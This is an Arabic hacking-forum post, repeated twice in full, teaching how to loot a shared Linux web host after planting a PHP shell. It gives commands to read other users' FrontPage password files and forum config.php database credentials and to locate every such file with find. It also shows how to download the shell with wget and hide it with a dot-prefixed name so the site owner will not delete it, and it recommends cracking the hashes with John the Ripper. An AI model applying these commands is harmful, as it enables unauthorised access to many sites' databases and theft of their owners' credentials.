Linux Root
10-26-07, 11:43 PM
الاوامر التالية :
cat /home/*/public_html/_vti_pvt/service.pwd
cat /home/*/public_html/_vti_pvt/access.cnf
cat /home/*/public_html/vb/admin/config.php
cat /home/*/public_html/phpbb/config.php
cat /home/*/public_html/forum/config.php
/usr/home/*/[Link nur für registrierte Benutzer sichtbar]
------------------
الي ابي اوضحه انه مو دائما تنفع هذي الاوامر راح تقولون لي ليش ؟؟ بقلكم لانه كل سيرفر وله تقسيمه الخاص فيه
طيب بشرح لكم كيف تسحب الملفات اذا ماوجدتوها بالاوامر الي حطها الاخ ياهوووو ...
بس قبل ماشرح ابي اوضح نقطة مهمة جدا
الي هي كيف تخفي سكربت الـ PHP SHELL عن النظر من الموقع عشان لا يشك صاحب الموقع ويحذفه لك ...
اوكي نبدأ الحين :
أول شيء تسويه تسحب من موقعك شيل من الشيل الي انت فيه بالطريقة هذي [Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar]) wget
الحين لازم أغير اسم الشيل عشان أخفيه بالطريقة هذي Mv 11.php .11.php
ملاحظين وش أضفنا اضفنا نقطة عشان يصير مخفي ولو حذف الاول الي محمله يكون معاك واحد مخفي ...
طيب الحين نرجع لموضوعنا الأول ( كيف نسحب : قواعد البيانات - المواقع - الباسوردات )
أولا نبدأ بالاسهل قواعد البيانات وتكون الباسوردات ماهي مشفرة : ونكتب هذا الأمر :
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/adamparker.com/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/aipep.com/[Link nur für registrierte Benutzer sichtbar]
طيب نبي نقرأ المكتوب بداخل الملف نكتب هذا الأمر :
cat /usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
راح يطلع لك ملف الكونفيج وفيه مكتوب اليوسر نيم والباسورد تبع قاعدة البيانات
طبعا الكل يعرف الـ phpBB انه قاعدة بيانات للمنتدى ... طيب الحين عندك اليوسر والباس جاهز على طول راح تشبك ببرنامج
MySQL-Front_2.5_Setup وعاد بعدين انت وراسك ... (3) (3) (3)
طيب الحين نبي نطلع باسوردات الموقع وهي اكيد راح تكون مشفرة
طبعا الكل يعرف ثغرة الفرونت بيج vti_pvt/service.pwd الحين راح نكتب الامر نستدعي كل ملفات الباسورد الي على السيرفر :
find / -name service.pwd
وراح يطلع لك بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/adamparker.com/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/aipep.com/[Link nur für registrierte Benutzer sichtbar]
اوكي الحين مثلا ابي استعرض باسورد هذا الموقع :
usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
راح اكتب هذا الامر :
cat /usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
راح يجيك الباسورد مشفر طبعا راح تفكه ببرنامج JHON THE RIPPER
انشاءالله أكون وفقت في الشرح ... والجميع يكون استوعب الدرس البسيط
منقوووول للفائدة
cat /home/*/public_html/_vti_pvt/service.pwd
cat /home/*/public_html/_vti_pvt/access.cnf
cat /home/*/public_html/vb/admin/config.php
cat /home/*/public_html/phpbb/config.php
cat /home/*/public_html/forum/config.php
/usr/home/*/[Link nur für registrierte Benutzer sichtbar]
------------------
الي ابي اوضحه انه مو دائما تنفع هذي الاوامر راح تقولون لي ليش ؟؟ بقلكم لانه كل سيرفر وله تقسيمه الخاص فيه
طيب بشرح لكم كيف تسحب الملفات اذا ماوجدتوها بالاوامر الي حطها الاخ ياهوووو ...
بس قبل ماشرح ابي اوضح نقطة مهمة جدا
الي هي كيف تخفي سكربت الـ PHP SHELL عن النظر من الموقع عشان لا يشك صاحب الموقع ويحذفه لك ...
اوكي نبدأ الحين :
أول شيء تسويه تسحب من موقعك شيل من الشيل الي انت فيه بالطريقة هذي [Link nur für registrierte Benutzer sichtbar] ([Link nur für registrierte Benutzer sichtbar]) wget
الحين لازم أغير اسم الشيل عشان أخفيه بالطريقة هذي Mv 11.php .11.php
ملاحظين وش أضفنا اضفنا نقطة عشان يصير مخفي ولو حذف الاول الي محمله يكون معاك واحد مخفي ...
طيب الحين نرجع لموضوعنا الأول ( كيف نسحب : قواعد البيانات - المواقع - الباسوردات )
أولا نبدأ بالاسهل قواعد البيانات وتكون الباسوردات ماهي مشفرة : ونكتب هذا الأمر :
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/adamparker.com/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/aipep.com/[Link nur für registrierte Benutzer sichtbar]
طيب نبي نقرأ المكتوب بداخل الملف نكتب هذا الأمر :
cat /usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
راح يطلع لك ملف الكونفيج وفيه مكتوب اليوسر نيم والباسورد تبع قاعدة البيانات
طبعا الكل يعرف الـ phpBB انه قاعدة بيانات للمنتدى ... طيب الحين عندك اليوسر والباس جاهز على طول راح تشبك ببرنامج
MySQL-Front_2.5_Setup وعاد بعدين انت وراسك ... (3) (3) (3)
طيب الحين نبي نطلع باسوردات الموقع وهي اكيد راح تكون مشفرة
طبعا الكل يعرف ثغرة الفرونت بيج vti_pvt/service.pwd الحين راح نكتب الامر نستدعي كل ملفات الباسورد الي على السيرفر :
find / -name service.pwd
وراح يطلع لك بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/adamparker.com/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
usr/local/plesk/apache/vhosts/aipep.com/[Link nur für registrierte Benutzer sichtbar]
اوكي الحين مثلا ابي استعرض باسورد هذا الموقع :
usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
راح اكتب هذا الامر :
cat /usr/local/plesk/apache/vhosts/ainvar.net/[Link nur für registrierte Benutzer sichtbar]
راح يجيك الباسورد مشفر طبعا راح تفكه ببرنامج JHON THE RIPPER
انشاءالله أكون وفقت في الشرح ... والجميع يكون استوعب الدرس البسيط
منقوووول للفائدة